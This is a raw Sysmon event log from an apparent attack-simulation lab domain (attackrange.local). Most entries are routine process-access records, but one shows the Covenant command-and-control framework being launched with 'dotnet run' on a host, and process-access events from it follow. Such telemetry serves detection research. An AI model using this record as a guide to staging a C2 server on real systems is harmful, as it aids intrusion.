10341000x8000000000000000149905Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:00.581{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149904Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:00.581{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149903Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:00.581{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149902Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:00.581{39BD8DE3-0FD7-60CA-7D00-00000000D101}21002896C:\Windows\system32\csrss.exe{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808C:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000149901Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:00.581{39BD8DE3-709A-60CA-080D-00000000D101}4924172C:\Program Files\dotnet\dotnet.exe{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808C:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(00007FF90F8D05FF) 154100x8000000000000000149900Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:00.577{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808C:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exe1.0.0.0CovenantCovenantCovenantCovenant.dll"C:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exe"C:\Users\Administrator\Covenant\Covenant\WIN-HOST-14\Administrator{39BD8DE3-0FD9-60CA-F738-070000000000}0x738f72HighMD5=8D7FA1ADCC0FB5A08580F8D3BAF7BCCE,SHA256=7FCACFF54EE688977A962EA1F5A6B145CCC8D3F2096C5E3234840B0B9CD928E2,IMPHASH=7D19699275E08B389D5869DC7132EFBC{39BD8DE3-709A-60CA-080D-00000000D101}4924C:\Program Files\dotnet\dotnet.exe"C:\Program Files\dotnet\dotnet.exe" run 23542300x8000000000000000149899Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:00.341{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E133550B51C4D8386494D785276358C,SHA256=255BDE57847AC06F2FC822A6B9E78EFD384EE4F95F0C2EB992F1386FF72DE7F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149898Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:00.309{39BD8DE3-0F64-60CA-0B00-00000000D101}6241252C:\Windows\system32\lsass.exe{39BD8DE3-709A-60CA-080D-00000000D101}4924C:\Program Files\dotnet\dotnet.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149897Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:00.309{39BD8DE3-0F64-60CA-0B00-00000000D101}6241252C:\Windows\system32\lsass.exe{39BD8DE3-709A-60CA-080D-00000000D101}4924C:\Program Files\dotnet\dotnet.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000104600Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:59.958{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal57959- 10341000x8000000000000000104599Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:01.409{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-70A1-60CA-2013-00000000CF01}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104598Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:01.407{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104597Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:01.407{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104596Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:01.407{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104595Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:01.406{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104594Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:01.406{54715871-FD16-60C9-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{54715871-70A1-60CA-2013-00000000CF01}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104593Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:01.406{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-70A1-60CA-2013-00000000CF01}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104592Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:01.405{54715871-70A1-60CA-2013-00000000CF01}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000149912Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:01.350{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E0068FF84FFCB17AEB07908715FE71B,SHA256=1A8AC7044920B52225B4929B60BF83A15A8DC1D7D082E38234D5BA8788B0AC6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149911Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:01.097{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=473F1BAD1CB1BF3BDBC49F5291D283E2,SHA256=D04B68AEDA8071EB535A4FFDF3BCD4B8991A32AEDDCFD3950A8D8F35A9A31091,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104601Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:02.130{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DEA659A15BD4A87582DA1DBED7A337B,SHA256=A5DCC9199474F2A63DCA4AD0DBF5F7EA6C849FF5E26151C3F2D6EC010C1DF2AC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149928Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:02.698{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x8000000000000000149927Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:02.698{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x8000000000000000149926Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:02.698{39BD8DE3-0F64-60CA-0C00-00000000D101}7206400C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x8000000000000000149925Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:02.698{39BD8DE3-0F64-60CA-0C00-00000000D101}7206400C:\Windows\system32\svchost.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x8000000000000000149924Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:02.698{39BD8DE3-0F64-60CA-0C00-00000000D101}7206400C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x8000000000000000149923Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:02.698{39BD8DE3-0FD9-60CA-8500-00000000D101}32645948C:\Windows\system32\sihost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149922Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 